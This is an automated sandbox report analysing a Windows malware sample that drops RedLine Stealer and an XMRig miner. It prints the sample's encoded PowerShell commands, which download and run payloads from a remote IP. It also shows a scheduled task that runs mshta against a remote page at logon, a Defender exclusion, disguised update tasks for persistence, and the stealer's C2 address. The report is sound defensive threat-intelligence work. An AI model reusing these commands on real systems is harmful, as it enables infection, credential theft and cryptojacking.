Analysis

  • max time kernel
    149s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20221111-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06-01-2023 01:42

General

  • Target

    file.exe

  • Size

    35KB

  • MD5

    cf841e717eb906b582cfd9db15a78eba

  • SHA1

    a329fe96b29b19881fbc8d329744783a0814a8dc

  • SHA256

    4a918ffe62fbbf1e196ed10be9a772a9a7889c43056ae8b3ebd16ece60a3b589

  • SHA512

    6c98589a2056add9e6f477134dc96ff29364587a2019bd16a0da4faa931d983e824fe7b907b004b9217b8ef3f06d08a27c48712d2ee26bc0b968911ccfae5940

  • SSDEEP

    768:Xn/web++Xra0byjOFHsGy4r/wOPpdwMNhghy0q9:X/dzXra0hu4kmTghy0w

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://62.204.41.194/go.png

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://62.204.41.194/F1.exe

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://62.204.41.194/me.png

Extracted

Family

redline

Botnet

$

C2

31.41.244.135:19850

Attributes
  • auth_value

    66623f79e2af33286760f5dd6c4262dc

Signatures

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 6 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 2 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 46 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4288
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -enc IAAgACQAZgA1AD0AJwBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwAnADsAIAAkAGYAMQA9ACcAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAJwA7ACAAJABmADMAPQAnAGEAZABTAHQAcgBpAG4AZwAoACcAJwBoAHQAdABwADoALwAvADYAMgAuADIAMAA0AC4ANAAxAC4AMQA5ADQALwBnAG8ALgBwAG4AZwAnACcAKQAnADsAJABHAE8ATwA9AEkAYABFAGAAWAAgACgAJABmADEALAAkAGYANQAsACQAZgAzACAALQBKAG8AaQBuACAAJwAnACkAfABJAGAARQBgAFgA
      2⤵
      • Blocklisted process makes network request
      • Adds Run key to start application
      • Checks processor information in registry
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3928
      • C:\Windows\SYSTEM32\schtasks.exe
        "schtasks" /create /tn "OneDrive Standalone Update Task - S - 1 - 5 - 21 - 3301851721 - 4018334294 - 377670162 - 1001" /sc ONLOGON /tr "mshta http://62.204.41.194/c.html " /rl HIGHEST /f
        3⤵
        • Creates scheduled task(s)
        PID:996
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -enc JABQAHIAbwBjAE4AYQBtAGUAIAA9ACAAIgBOAG8AUwBsAGUAZQBwAC4AZQB4AGUAIgANAAoAJABXAGUAYgBGAGkAbABlACAAPQAgACIAaAB0AHQAcAA6AC8ALwA2ADIALgAyADAANAAuADQAMQAuADEAOQA0AC8ARgAxAC4AZQB4AGUAIgANAAoAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAVwBlAGIARgBpAGwAZQAsACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXAAkAFAAcgBvAGMATgBhAG0AZQAiACkADQAKAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAoACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXAAkAFAAcgBvAGMATgBhAG0AZQAiACkA
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2096
      • C:\Users\Admin\AppData\Roaming\NoSleep.exe
        "C:\Users\Admin\AppData\Roaming\NoSleep.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:3104
        • C:\Windows\System32\conhost.exe
          "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\NoSleep.exe"
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2900
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAbABoAG4AIwA+ACAAUgBlAGcAaQBzAHQAZQByAC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgAC0AQQBjAHQAaQBvAG4AIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBBAGMAdABpAG8AbgAgAC0ARQB4AGUAYwB1AHQAZQAgACcAIgBDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAE8AbgBlAEQAcgBpAHYAZQBcAE8AbgBlAEQAcgBpAHYAZQAuAGUAeABlACIAJwApACAAPAAjAG0AeAAjAD4AIAAtAFQAcgBpAGcAZwBlAHIAIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBUAHIAaQBnAGcAZQByACAALQBBAHQATABvAGcATwBuACkAIAA8ACMAbQB0AHUAdAAjAD4AIAAtAFMAZQB0AHQAaQBuAGcAcwAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFMAZQB0AHQAaQBuAGcAcwBTAGUAdAAgAC0AQQBsAGwAbwB3AFMAdABhAHIAdABJAGYATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAGkAcwBhAGwAbABvAHcASABhAHIAZABUAGUAcgBtAGkAbgBhAHQAZQAgAC0ARABvAG4AdABTAHQAbwBwAEkAZgBHAG8AaQBuAGcATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAG8AbgB0AFMAdABvAHAATwBuAEkAZABsAGUARQBuAGQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFQAaQBtAGUATABpAG0AaQB0ACAAKABOAGUAdwAtAFQAaQBtAGUAUwBwAGEAbgAgAC0ARABhAHkAcwAgADEAMAAwADAAKQApACAAPAAjAGwAdwAjAD4AIAAtAFQAYQBzAGsATgBhAG0AZQAgACcARwBvAG8AZwBsAGUAVQBwAGQAYQB0AGUAVABhAHMAawBNAGEAYwBoAGkAbgBlAFEAQwAnACAAIAAtAFIAdQBuAEwAZQB2AGUAbAAgACcASABpAGcAaABlAHMAdAAnACAALQBGAG8AcgBjAGUAIAA8ACMAbgB3AHEAIwA+ADsAIABDAG8AcAB5AC0ASQB0AGUAbQAgACcAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABOAG8AUwBsAGUAZQBwAC4AZQB4AGUAJwAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuACAAJwBDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAE8AbgBlAEQAcgBpAHYAZQBcAE8AbgBlAEQAcgBpAHYAZQAuAGUAeABlACcAIAAtAEYAbwByAGMAZQAgADwAIwBlAHEAcwAjAD4AOwAgAFMAdABhAHIAdAAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAA8ACMAdwBmAGkAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAEcAbwBvAGcAbABlAFUAcABkAGEAdABlAFQAYQBzAGsATQBhAGMAaABpAG4AZQBRAEMAJwA7AA=="
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3808
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -enc IABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQAnAFwAQQBwAHAARABhAHQAYQAnAA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4468
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -enc IAAgACQAZgA1AD0AJwBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwAnADsAIAAkAGYAMQA9ACcAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAJwA7ACAAJABmADMAPQAnAGEAZABTAHQAcgBpAG4AZwAoACcAJwBoAHQAdABwADoALwAvADYAMgAuADIAMAA0AC4ANAAxAC4AMQA5ADQALwBtAGUALgBwAG4AZwAnACcAKQAnADsAJABHAE8ATwA9AEkAYABFAGAAWAAgACgAJABmADEALAAkAGYANQAsACQAZgAzACAALQBKAG8AaQBuACAAJwAnACkAfABJAGAARQBgAFgA
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4880
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:4808
  • C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
    C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    PID:3228
    • C:\Windows\System32\conhost.exe
      "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe"
      2⤵
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:4864
      • C:\Windows\System32\conhost.exe
        C:\Windows\System32\conhost.exe "cvxjxkjice"
        3⤵
          PID:4452
        • C:\Windows\System32\conhost.exe
          C:\Windows\System32\conhost.exe pjsnsurpv0 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPpZDYkQjcS/S/TS19hCmaZebSGUfj6Vuv+kPoPZ9FoidkTm/7TRz3Cxu5/LqhuwWCS2hvmHfyPTAWIo4zY5OcwjP+79VuJh5O5c9vMH8WB3WKocLPQQ3D/631f214VrDNh9z0jOLbJJ9YXALTSKeo3z0yqpo23wDcDd1T/hDfuDceoldVJQGMTDTCXN0Q0os5qQZpM/bbi7sbKmKkdCHj6mFIu02fq5LlHaQLCNyvHRzVgK320/ko7oR3JyhnmBQHtbZUpiFNPFJEf7lTC77qWxEJ3h4yjiCPgrTI6MoBbSgjAmpPlQgNd71RJ7lG0ikmSTeoT3CddgZH5TjpSuHbPN3ha82GVaI5+j+dJzAfNAaJfxYNDrhTxng1MpRAutdkSftro/iAbX8hcx7q/b7Qg7J3CyclBC4/Mwe/Jeo6Q9AKf6F7/3Yi99ifKM20LuEsFK/pU/n4DnNACnryf3RdME
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:4768

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Execution

    Scheduled Task

    1
    T1053

    Persistence

    Registry Run Keys / Startup Folder

    1
    T1060

    Scheduled Task

    1
    T1053

    Privilege Escalation

    Scheduled Task

    1
    T1053

    Defense Evasion

    Modify Registry

    1
    T1112

    Credential Access

    Credentials in Files

    1
    T1081

    Discovery

    Query Registry

    1
    T1012

    System Information Discovery

    1
    T1082

    Collection

    Data from Local System

    1
    T1005

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log
      Filesize

      642B

      MD5

      0b4ce74a6163ae20974c8ba4fdd4f1fa

      SHA1

      3c645b8b4d9bd437e7f1f74c21304452245dba1c

      SHA256

      2267541e715084f5cda2c56fe4186d937b73a3bb8e31a5e87cdc351ab558d4e7

      SHA512

      d3dd26b2817f22f38acebe03f6487d01421dea27717ac352a03b1b4bfec990d80796458cf608aa25e932bb91cfeedd25d6ced51cf3e554fdc3a1164bc3e5805c

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
      Filesize

      2KB

      MD5

      d85ba6ff808d9e5444a4b369f5bc2730

      SHA1

      31aa9d96590fff6981b315e0b391b575e4c0804a

      SHA256

      84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

      SHA512

      8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      70595b5937369a2592a524db67e208d3

      SHA1

      d989b934d9388104189f365694e794835aa6f52f

      SHA256

      be09b93a020e2e86a0b3c7c3f3d3e2c45f888944b1036df738385ede16f595c8

      SHA512

      edb412886187a2740eb7e284b16838bdd9f011aba1f4581f1fed25a86cdfe9b2ab4df863edeb3db6b072805439d57b10f3e0a1f2daabe1ee56db275ad2ad61e5

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      70595b5937369a2592a524db67e208d3

      SHA1

      d989b934d9388104189f365694e794835aa6f52f

      SHA256

      be09b93a020e2e86a0b3c7c3f3d3e2c45f888944b1036df738385ede16f595c8

      SHA512

      edb412886187a2740eb7e284b16838bdd9f011aba1f4581f1fed25a86cdfe9b2ab4df863edeb3db6b072805439d57b10f3e0a1f2daabe1ee56db275ad2ad61e5

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      13c3d8b3d0261676db86d7e76eec463f

      SHA1

      dce728068bc8cafbf873ecb109a34841b5609780

      SHA256

      ce06fea6c136a9ba9bfe5fc1f49cb96e349cfa510927543272f88ec40067f547

      SHA512

      708812d44fff9ea537a40b2b54551e90c9c8e7edd36b09d328ae69cca9f67f348ada0bbf1aa6734ddf77780e65a125458546a1a978d04f528889753e72b07a5d

    • C:\Users\Admin\AppData\Roaming\NoSleep.exe
      Filesize

      4.4MB

      MD5

      da256d1a520061b14d1cd013d99e84ff

      SHA1

      1aad91448144852bd1bf83dcb85bd14c6db160da

      SHA256

      feb1d6051d70d694ffbb8a1663f9eb16f69967ca000251a38a57475922e77280

      SHA512

      8e1d9da1768a1388af28e29d202ed3f576ffb787ef3ae49badb1093eac121b1207923adba9b953f07e051e5d4a22b0976a20df3aa0ec9b7ebe216842380c6a71

    • C:\Users\Admin\AppData\Roaming\NoSleep.exe
      Filesize

      4.4MB

      MD5

      da256d1a520061b14d1cd013d99e84ff

      SHA1

      1aad91448144852bd1bf83dcb85bd14c6db160da

      SHA256

      feb1d6051d70d694ffbb8a1663f9eb16f69967ca000251a38a57475922e77280

      SHA512

      8e1d9da1768a1388af28e29d202ed3f576ffb787ef3ae49badb1093eac121b1207923adba9b953f07e051e5d4a22b0976a20df3aa0ec9b7ebe216842380c6a71

    • C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
      Filesize

      4.4MB

      MD5

      da256d1a520061b14d1cd013d99e84ff

      SHA1

      1aad91448144852bd1bf83dcb85bd14c6db160da

      SHA256

      feb1d6051d70d694ffbb8a1663f9eb16f69967ca000251a38a57475922e77280

      SHA512

      8e1d9da1768a1388af28e29d202ed3f576ffb787ef3ae49badb1093eac121b1207923adba9b953f07e051e5d4a22b0976a20df3aa0ec9b7ebe216842380c6a71

    • C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
      Filesize

      4.4MB

      MD5

      da256d1a520061b14d1cd013d99e84ff

      SHA1

      1aad91448144852bd1bf83dcb85bd14c6db160da

      SHA256

      feb1d6051d70d694ffbb8a1663f9eb16f69967ca000251a38a57475922e77280

      SHA512

      8e1d9da1768a1388af28e29d202ed3f576ffb787ef3ae49badb1093eac121b1207923adba9b953f07e051e5d4a22b0976a20df3aa0ec9b7ebe216842380c6a71

    • memory/996-144-0x0000000000000000-mapping.dmp
    • memory/2096-140-0x00007FFE7E270000-0x00007FFE7ED31000-memory.dmp
      Filesize

      10.8MB

    • memory/2096-134-0x0000000000000000-mapping.dmp
    • memory/2096-150-0x00007FFE7E270000-0x00007FFE7ED31000-memory.dmp
      Filesize

      10.8MB

    • memory/2900-151-0x00007FFE7E270000-0x00007FFE7ED31000-memory.dmp
      Filesize

      10.8MB

    • memory/2900-157-0x00007FFE7E270000-0x00007FFE7ED31000-memory.dmp
      Filesize

      10.8MB

    • memory/2900-152-0x000001F196250000-0x000001F1966AB000-memory.dmp
      Filesize

      4.4MB

    • memory/3104-145-0x0000000000000000-mapping.dmp
    • memory/3808-156-0x00007FFE7E270000-0x00007FFE7ED31000-memory.dmp
      Filesize

      10.8MB

    • memory/3808-155-0x00007FFE7E270000-0x00007FFE7ED31000-memory.dmp
      Filesize

      10.8MB

    • memory/3808-153-0x0000000000000000-mapping.dmp
    • memory/3928-138-0x000001DD4DE40000-0x000001DD4DE62000-memory.dmp
      Filesize

      136KB

    • memory/3928-139-0x00007FFE7E270000-0x00007FFE7ED31000-memory.dmp
      Filesize

      10.8MB

    • memory/3928-160-0x00007FFE7E270000-0x00007FFE7ED31000-memory.dmp
      Filesize

      10.8MB

    • memory/3928-133-0x0000000000000000-mapping.dmp
    • memory/4288-137-0x00007FFE7E270000-0x00007FFE7ED31000-memory.dmp
      Filesize

      10.8MB

    • memory/4288-132-0x0000000000880000-0x0000000000890000-memory.dmp
      Filesize

      64KB

    • memory/4452-181-0x00007FFE7E270000-0x00007FFE7ED31000-memory.dmp
      Filesize

      10.8MB

    • memory/4452-191-0x00007FFE7E270000-0x00007FFE7ED31000-memory.dmp
      Filesize

      10.8MB

    • memory/4452-177-0x00000207B5B10000-0x00000207B5B29000-memory.dmp
      Filesize

      100KB

    • memory/4468-143-0x00007FFE7E270000-0x00007FFE7ED31000-memory.dmp
      Filesize

      10.8MB

    • memory/4468-142-0x00007FFE7E270000-0x00007FFE7ED31000-memory.dmp
      Filesize

      10.8MB

    • memory/4468-136-0x0000000000000000-mapping.dmp
    • memory/4768-176-0x0000000140000000-0x0000000140809000-memory.dmp
      Filesize

      8.0MB

    • memory/4768-178-0x000000014036EAC4-mapping.dmp
    • memory/4768-194-0x00000185BEDB0000-0x00000185BEDD0000-memory.dmp
      Filesize

      128KB

    • memory/4768-193-0x00000185BEDB0000-0x00000185BEDD0000-memory.dmp
      Filesize

      128KB

    • memory/4768-192-0x0000000140000000-0x0000000140809000-memory.dmp
      Filesize

      8.0MB

    • memory/4768-190-0x00000185BED40000-0x00000185BED80000-memory.dmp
      Filesize

      256KB

    • memory/4768-187-0x0000000140000000-0x0000000140809000-memory.dmp
      Filesize

      8.0MB

    • memory/4768-185-0x00000185BD370000-0x00000185BD390000-memory.dmp
      Filesize

      128KB

    • memory/4768-182-0x0000000140000000-0x0000000140809000-memory.dmp
      Filesize

      8.0MB

    • memory/4768-180-0x0000000140000000-0x0000000140809000-memory.dmp
      Filesize

      8.0MB

    • memory/4808-172-0x00000000057A0000-0x0000000005806000-memory.dmp
      Filesize

      408KB

    • memory/4808-170-0x0000000002F20000-0x0000000002F5C000-memory.dmp
      Filesize

      240KB

    • memory/4808-163-0x000000000041837E-mapping.dmp
    • memory/4808-161-0x0000000000400000-0x0000000000438000-memory.dmp
      Filesize

      224KB

    • memory/4808-179-0x00000000065E0000-0x0000000006656000-memory.dmp
      Filesize

      472KB

    • memory/4808-174-0x00000000063C0000-0x0000000006452000-memory.dmp
      Filesize

      584KB

    • memory/4808-175-0x0000000006A10000-0x0000000006FB4000-memory.dmp
      Filesize

      5.6MB

    • memory/4808-189-0x00000000076C0000-0x0000000007BEC000-memory.dmp
      Filesize

      5.2MB

    • memory/4808-183-0x0000000006360000-0x000000000637E000-memory.dmp
      Filesize

      120KB

    • memory/4808-188-0x0000000006FC0000-0x0000000007182000-memory.dmp
      Filesize

      1.8MB

    • memory/4808-165-0x0000000005B00000-0x0000000006118000-memory.dmp
      Filesize

      6.1MB

    • memory/4808-167-0x0000000002EC0000-0x0000000002ED2000-memory.dmp
      Filesize

      72KB

    • memory/4808-186-0x0000000006690000-0x00000000066E0000-memory.dmp
      Filesize

      320KB

    • memory/4808-168-0x00000000055F0000-0x00000000056FA000-memory.dmp
      Filesize

      1.0MB

    • memory/4864-184-0x00007FFE7E270000-0x00007FFE7ED31000-memory.dmp
      Filesize

      10.8MB

    • memory/4864-173-0x00000222E7020000-0x00000222E7032000-memory.dmp
      Filesize

      72KB

    • memory/4864-169-0x00007FFE7E270000-0x00007FFE7ED31000-memory.dmp
      Filesize

      10.8MB

    • memory/4880-141-0x00007FFE7E270000-0x00007FFE7ED31000-memory.dmp
      Filesize

      10.8MB

    • memory/4880-135-0x0000000000000000-mapping.dmp
    • memory/4880-171-0x00007FFE7E270000-0x00007FFE7ED31000-memory.dmp
      Filesize

      10.8MB

    • memory/4880-162-0x00007FFE7E270000-0x00007FFE7ED31000-memory.dmp
      Filesize

      10.8MB